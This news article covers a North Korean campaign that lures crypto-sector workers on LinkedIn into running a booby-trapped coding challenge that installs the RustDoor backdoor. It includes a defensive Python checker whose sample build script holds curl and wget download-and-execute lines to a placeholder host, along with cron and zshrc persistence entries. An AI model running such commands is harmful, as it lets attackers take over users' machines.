Cybersecurity analysts continue to warn that North Korean hackers are targeting potential victims on LinkedIn with the RustDoor malware.
The most recent notification is from Jamf Threat Labs, which identified an intrusion attempt where an individual was messaged on the professional networking platform under the guise of a recruiter representing an authentic decentralized digital currency exchange (DEX) known as STON.fi.
The malicious activity is part of a broader campaign by cyber threat actors sponsored by the Democratic People’s Republic of Korea (DPRK) to penetrate networks of interest to them under the pretext of conducting job interviews or assigning coding tasks.
The financial and digital currency sectors are top priorities for the state-backed adversaries aiming to earn illegal profits and fulfill changing objectives based on the regime’s concerns.
These breaches materialize in the form of “tailored, hard-to-spot social engineering campaigns” aimed at staff in decentralized finance (“DeFi”), digital currency, and similar companies, as recently highlighted by the U.S. Federal Bureau of Investigation (FBI) in a notice.
One of the notable signs of North Korean social engineering actions involves requests to execute code or install applications on corporate-owned devices, or devices with access to a company’s internal network.
Another point to note is that such attacks also include “requests to perform a ‘pre-job test’ or debugging task that entails running unconventional or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.”
Such tactics have been well documented in recent times, and they point to a steady refinement of the tooling used in these operations against targets.
The latest attack sequence identified by Jamf involves deceiving the victim into downloading a manipulated Visual Studio project as part of a so-called coding challenge that includes bash commands to fetch two distinct second-stage payloads (“VisualStudioHelper” and “zsh_env”) with similar functions.
This second-stage malware is RustDoor, which Jamf tracks as Thiefbucket. At the time of writing, no anti-malware engine has flagged the zipped coding test file as malicious; it was uploaded to the VirusTotal platform on August 7, 2024.
“The config files embedded within the two distinct malware samples indicate that VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file,” stated researchers Jaron Bradley and Ferdous Saljooki.
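The two technical details above, a "coding challenge" project whose build commands fetch and run second-stage payloads, and persistence through a cron entry and the zshrc file, are both things a defender can check for before running or after receiving such a project. The following script is an added example written for this article; it is not Jamf's code and does not reproduce the real samples. All inputs (the build script, crontab and .zshrc contents, the hostnames and file paths) are constructed for illustration, and the pattern lists are assumptions about what an unusual entry looks like.

```python
import re
from typing import Dict, List

# Constructed sample inputs (not taken from the real samples).
SAMPLE_BUILD_SCRIPT = """#!/bin/bash
set -e
echo "Building challenge..."
swift build
curl -s https://example.invalid/VisualStudioHelper -o /tmp/VisualStudioHelper && chmod +x /tmp/VisualStudioHelper && /tmp/VisualStudioHelper &
wget -q -O - https://example.invalid/zsh_env | bash
"""

SAMPLE_CRONTAB = """# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /Users/dev/Library/Caches/.vsh/VisualStudioHelper
"""

SAMPLE_ZSHRC = """export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
source ~/.zsh_env
/Users/dev/.config/zsh_env &
"""

# Heuristics (assumptions): a build script should not need to download
# remote content, and an rc file or cron entry should not launch binaries
# from temp, cache or hidden directories.
FETCH_TOOLS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(/\S*/)?(ba|z)?sh\b")
CHMOD_EXEC = re.compile(r"chmod\s+\+x")
SUSPICIOUS_DIRS = re.compile(r"(/tmp/|/var/tmp/|/Library/Caches/|/\.[A-Za-z0-9_-]+/)")
BACKGROUND = re.compile(r"(?<!&)&\s*$")


def find_fetch_and_exec(script_text: str) -> List[Dict[str, object]]:
    """Flag build-script lines that download remote content, with extra
    reasons when the line also pipes into a shell or marks a file executable."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        if not FETCH_TOOLS.search(line):
            continue
        reasons = ["downloads remote content"]
        if PIPE_TO_SHELL.search(line):
            reasons.append("pipes download into a shell")
        if CHMOD_EXEC.search(line):
            reasons.append("marks a file executable")
        findings.append({"line": lineno, "text": line.strip(), "reasons": reasons})
    return findings


def _inspect_command(command: str) -> List[str]:
    reasons = []
    if SUSPICIOUS_DIRS.search(command):
        reasons.append("unusual path (temp, cache or hidden directory)")
    if FETCH_TOOLS.search(command):
        reasons.append("downloads remote content")
    if BACKGROUND.search(command):
        reasons.append("launches a background process")
    return reasons


def audit_persistence(crontab_text: str, zshrc_text: str) -> Dict[str, List[Dict[str, object]]]:
    """Review crontab and .zshrc contents for entries that look like the
    persistence mechanisms described (cron job, shell rc file)."""
    report: Dict[str, List[Dict[str, object]]] = {"crontab": [], "zshrc": []}
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        parts = stripped.split(None, 5)  # five schedule fields, then command
        command = parts[5] if len(parts) == 6 else stripped
        reasons = _inspect_command(command)
        if reasons:
            report["crontab"].append({"line": lineno, "text": stripped, "reasons": reasons})
    for lineno, line in enumerate(zshrc_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        reasons = _inspect_command(stripped)
        if reasons:
            report["zshrc"].append({"line": lineno, "text": stripped, "reasons": reasons})
    return report


if __name__ == "__main__":
    for hit in find_fetch_and_exec(SAMPLE_BUILD_SCRIPT):
        print("build script line %d: %s" % (hit["line"], ", ".join(hit["reasons"])))
    for source, hits in audit_persistence(SAMPLE_CRONTAB, SAMPLE_ZSHRC).items():
        for hit in hits:
            print("%s line %d: %s" % (source, hit["line"], ", ".join(hit["reasons"])))
```

On a real machine the crontab and rc contents would come from `crontab -l` and `~/.zshrc`; the script keeps those as parameters so it can be run against copies collected during triage. The heuristics are deliberately narrow to keep noise low; a benign `swift build` line or a `source` of a dotfile is not flagged, while a download piped into a shell or a cron job pointing into a hidden cache directory is.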
RustDoor, a macOS backdoor, was initially discussed by Bitdefender in February 2024 in relation to a malware scheme targeting digital currency companies. A subsequent investigation by S2W revealed a Golang variant named GateDoor aimed at infecting Windows machines.
Jamf's findings are notable not only because they attribute the malware to North Korean hackers for the first time, but also because the malware is written in Objective-C.

VisualStudioHelper also functions as an information stealer, collecting files listed in its configuration, but only after prompting the user for their system password under the guise of a request from the Visual Studio application so as to avoid raising suspicion.
Both payloads, however, operate as backdoors and communicate with two different servers for command-and-control (C2) purposes.
“Threat actors persist in devising new methods to target individuals in the crypto sector,” highlighted the researchers. “It’s vital to educate your staff, including developers, to be cautious when interacting with individuals on social media asking them to run any kind of software.
“These social engineering tactics by the DPRK are employed by individuals fluent in English who enter the conversation after extensive research on their target.”